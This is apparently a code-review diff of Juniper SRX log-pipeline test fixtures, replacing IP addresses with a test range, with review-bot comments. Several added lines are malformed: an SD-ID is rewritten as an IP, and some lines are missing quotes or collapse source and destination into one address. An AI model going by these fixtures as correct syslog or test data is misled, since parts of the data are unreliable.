RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@67.43.156.15 epoch-time="1319367986" ddos-application-name="Webserver" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" rulebase-name="DDOS" policy-name="A DoS-Webserver" repeat-count="0" message="Connection rate exceeded limit 60" context-value="N/A"] +<165>1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@67.43.156.15 epoch-time="1319419711" 
ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth1.O" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] +<165>1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@67.43.156.15 epoch-time="1419419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth3.0" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.1" destination-address="172.30.20.201" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS02" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json index f7fc1553c1b..2d9eb57de25 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json @@ -8,7 +8,7 @@ "port": 123, "bytes": 0, "packets": 0, - "ip": "187.188.188.10" + "ip": "67.43.156.14" }, "log": { "level": "notification" 
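Review bot: The structured-data ID `junos@2636.1.1.1.2.28` (and `junos@2636.1.1.1.2.35` on the last three lines) has been rewritten to `junos@67.43.156.15` in every `+` line, but that token is the RFC 5424 SD-ID carrying Juniper's enterprise number, not an IP address, so it does not belong in the test-IP substitution and should be restored to `junos@2636.1.1.1.2.28` / `junos@2636.1.1.1.2.35`; the same rewrite shows up in the srx expected output earlier in this diff, whose input log is outside this view. The third and fourth `+` lines now use `67.43.156.14` for both `source-address` and `destination-address`, which collapses `related.ip` in the expected output from four entries to three and means a source/destination mix-up in the pipeline would no longer be caught by this fixture; using a distinct supported address such as `67.43.156.15` for the destination keeps that coverage. The last line also changes `source-address` from `193.168.14.214` to `192.168.14.214`, which is unrelated to the public-IP subset and is worth calling out in the changelog entry.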
@@ -16,12 +16,12 @@
 "destination": {
 "nat": {
 "port": 9757,
- "ip": "3.3.10.11"
+ "ip": "67.43.156.15"
 },
 "port": 123,
 "bytes": 0,
 "packets": 0,
- "ip": "187.188.188.10"
+ "ip": "67.43.156.14"
 },
 "rule": {
 "name": "IPS",
@@ -94,9 +94,9 @@
 ],
 "ip": [
 "10.11.11.1",
- "187.188.188.10",
+ "67.43.156.14",
 "0.0.0.0",
- "3.3.10.11"
+ "67.43.156.15"
 ]
 },
 "client": {
@@ -111,8 +111,8 @@ "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-06T12:25:29.196345082Z", - "original": "\u003c165\u003e1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"187.188.188.10\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"HTTP:MISC:GENERIC-DIR-TRAVERSAL\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"3.3.10.11\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", + "ingested": "2021-12-09T13:40:03.197201400Z", + "original": "\u003c165\u003e1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"67.43.156.14\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"HTTP:MISC:GENERIC-DIR-TRAVERSAL\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" 
source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]",
 "kind": "alert",
 "start": "2020-03-02T23:13:03.193Z",
 "action": "security_threat",
@@ -137,7 +137,7 @@
 "port": 123,
 "bytes": 0,
 "packets": 0,
- "ip": "187.188.188.10"
+ "ip": "67.43.156.14"
 },
 "log": {
 "level": "notification"
@@ -145,12 +145,12 @@
 "destination": {
 "nat": {
 "port": 9757,
- "ip": "3.3.10.11"
+ "ip": "67.43.156.15"
 },
 "port": 123,
 "bytes": 0,
 "packets": 0,
- "ip": "187.188.188.10"
+ "ip": "67.43.156.14"
 },
 "rule": {
 "name": "IPS",
@@ -223,9 +223,9 @@
 ],
 "ip": [
 "10.11.11.1",
- "187.188.188.10",
+ "67.43.156.14",
 "0.0.0.0",
- "3.3.10.11"
+ "67.43.156.15"
 ]
 },
 "client": {
@@ -240,8 +240,8 @@
 "event": {
 "duration": 0,
 "severity": 165,
- "ingested": "2021-12-06T12:25:29.196353078Z",
- "original": "\u003c165\u003e1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"187.188.188.10\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"CRITICAL\" attack-name=\"TCP:C2S:AMBIG:C2S-SYN-DATA\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"3.3.10.11\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]",
+ "ingested": "2021-12-09T13:40:03.197210Z",
+ "original": "\u003c165\u003e1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"67.43.156.14\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"CRITICAL\" attack-name=\"TCP:C2S:AMBIG:C2S-SYN-DATA\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]",
 "kind": "alert",
 "start": "2020-03-02T23:13:03.197Z",
 "action": "security_threat",
@@ -266,7 +266,7 @@
 "port": 80,
 "bytes": 0,
 "packets": 0,
- "ip": "118.127.111.1"
+ "ip": "67.43.156.14"
 },
 "log": {
 "level": "notification"
@@ -279,7 +279,7 @@
 "port": 80,
 "bytes": 0,
 "packets": 0,
- "ip": "118.127.111.1"
+ "ip": "67.43.156.14"
 },
 "rule": {
 "name": "IPS",
@@ -293,7 +293,7 @@
 "port": 45610,
 "bytes": 0,
 "packets": 0,
- "ip": "183.78.180.27"
+ "ip": "67.43.156.14"
 },
 "juniper": {
 "srx": {
@@ -343,8 +343,7 @@
 },
 "related": {
 "ip": [
- "183.78.180.27",
- "118.127.111.1",
+ "67.43.156.14",
 "0.0.0.0",
 "172.19.13.11"
 ]
@@ -356,13 +355,13 @@
 "port": 45610,
 "bytes": 0,
 "packets": 0,
- "ip": "183.78.180.27"
+ "ip": "67.43.156.14"
 },
 "event": {
 "duration": 0,
 "severity": 165,
- "ingested": "2021-12-06T12:25:29.196355011Z",
- "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"183.78.180.27\" source-port=\"45610\" destination-address=\"118.127.111.1\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.19.13.11\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]",
+ "ingested": "2021-12-09T13:40:03.197213600Z",
+ "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"67.43.156.14\" source-port=\"45610\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.19.13.11\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]",
 "kind": "alert",
 "start": "2007-02-15T09:17:15.719Z",
 "action": "security_threat",
@@ -387,7 +386,7 @@
 "port": 80,
 "bytes": 0,
 "packets": 0,
- "ip": "118.127.30.11"
+ "ip": "67.43.156.14"
 },
 "log": {
 "level": "notification"
@@ -400,7 +399,7 @@
 "port": 80,
 "bytes": 0,
 "packets": 0,
- "ip": "118.127.30.11"
+ "ip": "67.43.156.14"
 },
 "rule": {
 "name": "IPS",
@@ -414,7 +413,7 @@
 "port": 45610,
 "bytes": 0,
 "packets": 0,
- "ip": "183.78.180.27"
+ "ip": "67.43.156.14"
 },
 "juniper": {
 "srx": {
@@ -464,8 +463,7 @@
 },
 "related": {
 "ip": [
- "183.78.180.27",
- "118.127.30.11",
+ "67.43.156.14",
 "0.0.0.0",
 "172.16.1.10"
 ]
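Review bot: In the rewritten `event.original` of the TROJAN:ZMEU-BOT-SCAN event, `source-address` and `destination-address` are now both `67.43.156.14` where the old fixture had two distinct addresses, which is why `related.ip` shrinks from two entries to one in the `@@ -343` hunk above (and again in `@@ -464` below for the second ZMEU event). With source and destination identical, the expected output can no longer distinguish a source/destination swap in the pipeline from correct behaviour. The supported range already provides distinct addresses in this commit (`67.43.156.13`, `.14`, `.15`), so assign one per role, e.g. `source-address=\"67.43.156.13\"` with `destination-address=\"67.43.156.14\"`, and regenerate; the same collapse affects most lines of test-ids.log. The event object enclosing this hunk starts before it.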
@@ -477,13 +475,13 @@
 "port": 45610,
 "bytes": 0,
 "packets": 0,
- "ip": "183.78.180.27"
+ "ip": "67.43.156.14"
 },
 "event": {
 "duration": 0,
 "severity": 165,
- "ingested": "2021-12-06T12:25:29.196356484Z",
- "original": "\u003c165\u003e1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"183.78.180.27\" source-port=\"45610\" destination-address=\"118.127.30.11\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.16.1.10\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]",
+ "ingested": "2021-12-09T13:40:03.197218Z",
+ "original": "\u003c165\u003e1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"67.43.156.14\" source-port=\"45610\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.16.1.10\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]",
 "kind": "alert",
 "start": "2017-10-12T21:55:55.792Z",
 "action": "security_threat",
@@ -557,8 +555,8 @@
 },
 "event": {
 "severity": 165,
- "ingested": "2021-12-06T12:25:29.196357997Z",
- "original": "\u003c165\u003e1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@2636.1.1.1.2.35 epoch-time=\"1319367986\" ddos-application-name=\"Webserver\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" rulebase-name=\"DDOS\" policy-name=\"A DoS-Webserver\" repeat-count=\"0\" message=\"Connection rate exceeded limit 60\" context-value=\"N/A\"]",
+ "ingested": "2021-12-09T13:40:03.197223300Z",
+ "original": "\u003c165\u003e1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@67.43.156.15 epoch-time=\"1319367986\" ddos-application-name=\"Webserver\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" rulebase-name=\"DDOS\" policy-name=\"A DoS-Webserver\" repeat-count=\"0\" message=\"Connection rate exceeded limit 60\" context-value=\"N/A\"]",
 "kind": "alert",
 "action": "application_ddos",
 "category": [
@@ -653,8 +651,8 @@
 },
 "event": {
 "severity": 165,
- "ingested": "2021-12-06T12:25:29.196359720Z",
- "original": "\u003c165\u003e1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@2636.1.1.1.2.35 epoch-time=\"1319419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth1.O\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]",
+ "ingested": "2021-12-09T13:40:03.197228800Z",
+ "original": "\u003c165\u003e1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@67.43.156.15 epoch-time=\"1319419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth1.O\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]",
 "kind": "alert",
 "action": "application_ddos",
 "category": [
@@ -686,7 +684,7 @@
 },
 "source": {
 "port": 50825,
- "ip": "193.168.14.214"
+ "ip": "192.168.14.214"
 },
 "juniper": {
 "srx": {
@@ -739,18 +737,18 @@
 },
 "related": {
 "ip": [
- "193.168.14.214",
+ "192.168.14.214",
 "172.30.20.201"
 ]
 },
 "client": {
 "port": 50825,
- "ip": "193.168.14.214"
+ "ip": "192.168.14.214"
 },
 "event": {
 "severity": 165,
- "ingested": "2021-12-06T12:25:29.196361283Z",
- "original": "\u003c165\u003e1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@2636.1.1.1.2.35 epoch-time=\"1419419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth3.0\" source-address=\"193.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.1\" destination-address=\"172.30.20.201\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS02\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]",
+ "ingested": "2021-12-09T13:40:03.197234200Z",
+ "original": "\u003c165\u003e1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@67.43.156.15 epoch-time=\"1419419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth3.0\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.1\" destination-address=\"172.30.20.201\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS02\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]",
 "kind": "alert",
 "action": "application_ddos",
 "category": [
diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log
index 249f2db45ab..bd7fa05b7cc 100644
--- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log
+++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log
@@ -1,12 +1,12 @@
-<11>1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.137 attack-name="TCP sweep!" source-address="81.2.69.145" source-port="6000" destination-address="81.2.69.193" destination-port="1433" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
-<11>1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.36 attack-name="WinNuke attack!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" source-port="3240" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-port="139" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
-<11>1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.40 attack-name="SYN flood!" source-address="81.2.69.143" source-port="40001" destination-address="81.2.69.143" destination-port="50010" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@2636.81.2.69.143.40 attack-name="UDP flood!" source-address="81.2.69.193" source-port="40001" destination-address="81.2.69.143" destination-port="53" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@2636.81.2.69.143.40 attack-name="ICMP fragment!" source-address="81.2.69.193" destination-address="81.2.69.143" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.143.40 attack-name="Record Route IP option!" source-address="81.2.69.193" destination-address="81.2.69.143" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.143.40 attack-name="Tunnel GRE 6in6!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.143.40 attack-name="Tunnel GRE 4in4!" source-address="81.2.69.193" destination-address="81.2.69.193" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@2636.81.2.69.143.40 attack-name="SYN flood!" destination-address="81.2.69.143" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
-<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@2636.81.2.69.143.40 attack-name="SYN flood!" source-address="81.2.69.193" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
-<11>1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.129 attack-name="TCP port scan!" source-address="216.160.83.61" source-port="50630" destination-address="81.2.69.193" destination-port="10778" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.143.129 attack-name="FIN but no ACK bit!" source-address="216.160.83.61" source-port="42799" destination-address="81.2.69.193" destination-port="7" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="TCP sweep!" source-address="67.43.156.13" source-port="6000" destination-address="67.43.156.14" destination-port="1433" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
+<11>1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="WinNuke attack!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" source-port="3240" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-port="139" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
+<11>1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="SYN flood!" source-address="67.43.156.15" source-port="40001" destination-address=67.43.156.15" destination-port="50010" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@67.43.156.15 attack-name="UDP flood!" source-address="67.43.156.15" source-port="40001" destination-address="67.43.156.15" destination-port="53" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@67.43.156.15 attack-name="ICMP fragment!" source-address="67.43.156.15" destination-address="67.43.156.15" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name="Record Route IP option!" source-address="67.43.156.15" destination-address="67.43.156.15" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name="Tunnel GRE 6in6!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name="Tunnel GRE 4in4!" source-address="67.43.156.13" destination-address="67.43.156.15" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@67.43.156.15 attack-name="SYN flood!" destination-address=67.43.156.15" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
+<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@67.43.156.15 attack-name="SYN flood!" source-address="67.43.156.15" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
+<11>1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="TCP port scan!" source-address="10.1.1.100" source-port="50630" destination-address="10.1.1.1" destination-port="10778" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
